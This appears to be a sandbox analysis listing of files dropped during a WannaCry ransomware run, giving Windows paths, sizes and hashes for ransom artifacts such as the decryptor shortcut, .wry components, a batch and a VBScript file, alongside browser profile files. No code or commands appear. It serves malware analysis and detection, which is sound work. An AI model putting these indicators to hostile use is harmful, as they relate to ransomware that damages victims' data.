C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
700B

MD5
dfe8b1632e1ab16a1021c89ac3975cfa

SHA1
aa4614d4696f46d4ea88ec9e0bbb1bccdd5e0493

SHA256
7a34b7406ad535ba8fc9ebdc812b2fae464b362f61cc715c7616ec44b7c3febe

SHA512
9607651598ed16cd808fb2bf4db42357ef55556ce24af0e122afa0c8868f74217c0b485df561cdaf078253a39a584fdb521e4cd2ace5521d7871c3322755ee4a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
1a89f3dfe2715b62bec1263e5a4ee522

SHA1
b571ce72ed349951274407c42ceac8a640fed78c

SHA256
96b80db9ca7b1fde574db8d1976bb7bb71075e762c53a088bffd0f0ed96b3467

SHA512
886f9096f374de9c9db9f9ebe719b202f78ae61227675a28c8f487db4d7d4e205d4139f226ad54d3ab47f2aa889e749f9d08779b676dad74ac0af384a66db4e4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
7876cc6997e0505ae3769aff6d046bd2

SHA1
4087a476f4b010c0a2907953203d8597ac871117

SHA256
c61620dfd008cc413fb824f258ff86792f91676958f628a79c40bd4ed3c83aec

SHA512
f282352cb4ec8283e0ca449a6bf95fdff4810cb02ff0156c725cb08b7ea9eb67d741e084a37b3eff2c1393798549c39846b9ed24ef93b8213274e42bc3239846

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
702B

MD5
0203b49d258bc726b06f8f47ef693b06

SHA1
772ce95455f9fb9b4ebb8c9437b3b39f5df39a3b

SHA256
72e3abce8aa2b45ec28a36b24709de8ef0ad9e596857286c36d17b51cb37ce45

SHA512
adab930e866595bd907a4687e2aa5c81e7d89401404f01ddaa0811d1607b09e00bf428587ea682a7336c46b22872f8dcf6528c9c82ee4c00948efa89bfbb0d31

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
441c94e2b3018874fa6e000200b745f7

SHA1
dceaa518347427cac81bd36ec3668d0cc59582e9

SHA256
128317b553d3a4e5720122866fb8b4cb8732d9c726ce845c6f206df09bb5c53f

SHA512
a1030f5db4417d4bf53e20e5b99b152820b4084623dbb84a2c61172704b913fe18b692ffea1f21cbfbde265fbdd7915d6fe0023b6ef29b17c812a226b050e524

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe582e7d.TMP

Filesize
698B

MD5
90c561ddf099f11dd93fcdadff5d8779

SHA1
4a4aa9123b31413483b7bce2af6b6619177cf657

SHA256
b6f22d8768743e9d53c01afd8dd459374ea6f75cebb3865aee271e645d6a1468

SHA512
cfee70e9ad5e65621b9f7f10e1ed7e60c1f82fcaee10e7bde1f00611d068428ff360191a2d579fad068c0e593be441804598bad4ee2833cebf2b04648b7fce34

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db

Filesize
16KB

MD5
9a8e0fb6cf4941534771c38bb54a76be

SHA1
92d45ac2cc921f6733e68b454dc171426ec43c1c

SHA256
9ee9211a57c3f6fa211fe0323fa8cd521e7cbffcd8ff0896645a45795dc472be

SHA512
12ed22537dcc79d53f6c7d39e92a38f8fea076d793198928f5b7a5dd1234d50a3c0b4815632f3fadf8bc4ef0499773d22bd83f961d2d0ffd8afacf471bd3a5ae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\previews_opt_out.db

Filesize
16KB

MD5
d926f072b41774f50da6b28384e0fed1

SHA1
237dfa5fa72af61f8c38a1e46618a4de59bd6f10

SHA256
4f7b0e525d4bfc53d5df49589e25a0bccf2fcf6a1a0ca3f94d3285bb9cf0a249

SHA512
a140df6ec0d3099ef374e8f3ece09bf91bc896ac4a1d251799a521543fe9bdea796ba09fa47932bd54fa939118495078f9258557b32c31d3d4011b0666a4723f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
d0427f733ec393ff9aabe2422b75474e

SHA1
6088e57dc77c7db01b869e00b5551810c2e2201d

SHA256
6635beae7111c509fce95c510a82df289dac209fcf597dd67aba583a8f06ca43

SHA512
c64af78dc263c2ddd1ca209f95f71cfaf070ea1e726b305c41e26c51892d227b3ab9508f25f773283c4351cc4424a6cda5acf09a82d652b69417f74e01909f38

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
ec468372fe85a6e6b56489f0ed584bed

SHA1
640d624d6f4f183ce3a4e63e1467b8d12e7aa37e

SHA256
02b2500afaf1ae8ca4af4fa3cf5753f088bf506f6f02385df2d6917b2df7d47b

SHA512
0074196b0d5ae3d6d95afd51b64c67dd0c62361339dfb5f33869aaf628b5a5031a8f4cab8c9472e74338436c3b7e59466117759c07ef6f50cb93a4d365240ba2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
0820090d5871f135c3eeb960798418d5

SHA1
1a8e5f977c86be28506df72764279f5a9e37ebe7

SHA256
21f291e3da2df8f4f4fc3a2f91dbeb0c32078897ea3204b00e70528dd6451e65

SHA512
caec4d3a98d926fd19a7ad5c5c6964e3b4ff91d5850031cd98be48bb5b20871d53b608f68cc8469966d71bd9467269e20bc46ea48aabd9e9f14db4b502a7e8bd

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

Filesize
10KB

MD5
2b38ebcf2148207d5409435c37baa91f

SHA1
87fe72e51fb68082049a3233e6184f15ae69a81a

SHA256
07bb1c37aa8388d6f7b9e5a4f1a88e453d633d40f3cdb7fc2bb2a9b6b3f200c4

SHA512
37b2c8ca0ffd135e99d5248b4159cab2dcc5e41bf46cf7f40e0da2c57c66f7f4ee0ca863df5f545ad9ddee5dabe7fb63d699168236212a03f2551f1c629ebcf6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Spelling\en-US\default.dic

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\Downloads\!Please Read Me!.txt

Filesize
797B

MD5
afa18cf4aa2660392111763fb93a8c3d

SHA1
c219a3654a5f41ce535a09f2a188a464c3f5baf5

SHA256
227082c719fd4394c1f2311a0877d8a302c5b092bcc49f853a5cf3d2945f42b0

SHA512
4161f250d59b7d4d4a6c4f16639d66d21b2a9606de956d22ec00bedb006643fedbbb8e4cde9f6c0c977285918648314883ca91f3442d1125593bf2605f2d5c6b

Download Submit
C:\Users\Admin\Downloads\!WannaDecryptor!.exe.lnk

Filesize
590B

MD5
bc5d0f8cc466dd15931bfa5366ad843a

SHA1
8ce2e3ba39352a086e448a1ff7db8485232851c5

SHA256
9e59a75c665385212171fd0c6e34f7fcffa40bda51abf2b6a78a145b293170f3

SHA512
b8ef91d72ffbfe0ebca2daa47464372997b8db0232be4031b20290c7f2441983428b9329294b8b3c6e1f242e8e0d96c29f6e3c2dc629424b49ea551bfa16d7d6

Download Submit
C:\Users\Admin\Downloads\00000000.res

Filesize
136B

MD5
447ae66d92c86153a302d920c62d54f4

SHA1
444253f814b00a51cdbf4816a4f3dcd59c68a436

SHA256
e2f17c4f15e447bfdc04972d46ea1a27f8381ae97d2e96efdbdfae34345af7d0

SHA512
41ae0412cb163fc7b8c10a00d11a6db5642a9e6f8aa25d4657c336a852ef9a1c2b28236bd1456c0c7d4d84f6bd5a47ff9214e59de12b59838dd6b8f21d0ab3e8

Download Submit
C:\Users\Admin\Downloads\00000000.res

Filesize
136B

MD5
2cef599626a3ec1c96d9c702a48c8981

SHA1
fac5e86246dc6eaaeae91c1206d8fb433951e256

SHA256
c4bc94afb5c915a9e4d974e15615ad8c652eb8022fcf1e84c37e034544fe4b97

SHA512
00f3525b746a2aed9e958f9032859f98e9182852b13c8e85ace0ed08fbadb5d6e66b5ba34970e5f434fc889c629571745852df0892c648edf6b1683260cbf741

Download Submit
C:\Users\Admin\Downloads\00000000.res

Filesize
136B

MD5
8119e21f2159198094e920e8ec808791

SHA1
d63abf72a2dbe210243c440a72020919f6491d21

SHA256
57db039c80d4c902e046c70941701598e9b47704d51e18b0fb7855774f74df55

SHA512
f32d3d3af1f00f74e337a0bea919fc83ebe569e526617bcebf5ac955c74d8c42d9ca2a42cbda028fe35318da7999ae1c49ec14d015869896c70747ba7a6c8adf

Download Submit
C:\Users\Admin\Downloads\228071721577688.bat

Filesize
318B

MD5
a261428b490a45438c0d55781a9c6e75

SHA1
e9eefce11cefcbb7e5168bfb8de8a3c3ac45c41e

SHA256
4288d655b7de7537d7ea13fdeb1ba19760bcaf04384cd68619d9e5edb5e31f44

SHA512
304887938520ffcc6966da83596ccc8688b7eace9572982c224f3fb9c59e6fb2dcaa021a19d2aae47346e954c0d0d8145c723b7143dece11ac7261dc41ba3d40

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 4183.crdownload

Filesize
224KB

MD5
5c7fb0927db37372da25f270708103a2

SHA1
120ed9279d85cbfa56e5b7779ffa7162074f7a29

SHA256
be22645c61949ad6a077373a7d6cd85e3fae44315632f161adc4c99d5a8e6844

SHA512
a15f97fad744ccf5f620e5aabb81f48507327b898a9aa4287051464019e0f89224c484e9691812e166471af9beaddcfc3deb2ba878658761f4800663beef7206

Download Submit
C:\Users\Admin\Downloads\WannaCry.exe:Zone.Identifier

Filesize
26B

MD5
fbccf14d504b7b2dbcb5a5bda75bd93b

SHA1
d59fc84cdd5217c6cf74785703655f78da6b582b

SHA256
eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

SHA512
aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

Download Submit
C:\Users\Admin\Downloads\c.vbs

Filesize
201B

MD5
02b937ceef5da308c5689fcdb3fb12e9

SHA1
fa5490ea513c1b0ee01038c18cb641a51f459507

SHA256
5d57b86aeb52be824875008a6444daf919717408ec45aff4640b5e64610666f1

SHA512
843eeae13ac5fdc216b14e40534543c283ecb2b6c31503aba2d25ddd215df19105892e43cf618848742de9c13687d21e8c834eff3f2b69a26df2509a6f992653

Download Submit
C:\Users\Admin\Downloads\c.wry

Filesize
628B

MD5
4e5241292ee038708d54a4b61e7a47db

SHA1
bfeb29f6d4f6eb72a3f2e37d498646af4051178b

SHA256
88672d5f018d3ed121ae58b9a3aababebb59beccf45be17c7d80520448062df3

SHA512
f332e28db5cf4d45dd70ba660336e8d14b2a891a904549ccdc8001ae8ee5c3e32267d9e69761edc3ad1bcca341b31094919883ca92b234943323d60e52a640d9

Download Submit
C:\Users\Admin\Downloads\m.wry

Filesize
42KB

MD5
980b08bac152aff3f9b0136b616affa5

SHA1
2a9c9601ea038f790cc29379c79407356a3d25a3

SHA256
402046ada270528c9ac38bbfa0152836fe30fb8e12192354e53b8397421430d9

SHA512
100cda1f795781042b012498afd783fd6ff03b0068dbd07b2c2e163cd95e6c6e00755ce16b02b017693c9febc149ed02df9df9b607e2b9cca4b07e5bd420f496

Download Submit
C:\Users\Admin\Downloads\u.wry

Filesize
236KB

MD5
cf1416074cd7791ab80a18f9e7e219d9

SHA1
276d2ec82c518d887a8a3608e51c56fa28716ded

SHA256
78e3f87f31688355c0f398317b2d87d803bd87ee3656c5a7c80f0561ec8606df

SHA512
0bb0843a90edacaf1407e6a7273a9fbb896701635e4d9467392b7350ad25a1bec0c1ceef36737b4af5e5841936f4891436eded0533aa3d74c9a54efa42f024c5

Download Submit
memory/1984-477-0x0000000010000000-0x0000000010012000-memory.dmp

Filesize
72KB

Download